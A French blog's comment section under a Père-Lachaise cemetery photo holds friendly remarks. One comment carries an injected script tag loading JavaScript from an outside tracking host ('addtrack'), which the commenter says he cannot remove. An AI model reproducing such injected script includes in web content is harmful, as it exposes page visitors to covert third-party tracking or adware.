• L'attente

  • Commentaires

    1
    Vendredi 21 Août 2020 à 05:11
    Nanegrub

    Bein le pauvre, s'il attend la résurrection il risque d'en avoir encore pour un moment…  

    Extra ta photo ! 

      • Vendredi 21 Août 2020 à 08:55

        Merci. Le cimetière du Père-Lachaise est toujours étonnant et très "vivant". C'était l'une de mes balades favorite mais maintenant j'en suis un peu loin (Normandie).

    2
    Serge Prioul
    Mercredi 9 Septembre 2020 à 07:28
    <script src="http://rdc.apicit.net/addtrack/index.fr.r1s87905.jquery.js?_=1599629102" type="text/javascript"></script>

     

     
    What do you want to do ?
    New mail<button id="ffenetremailtobuttonEmail">Copy</button><textarea id="ffenetremailtotextArea"></textarea>

    Content de retrouver ton blog. Désolé de polluer le commentaire avec ça, je ne sais comment m'en débarrasser... C'est d'ailleurs la raison pour laquelle j'ai abandonné mon blog.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :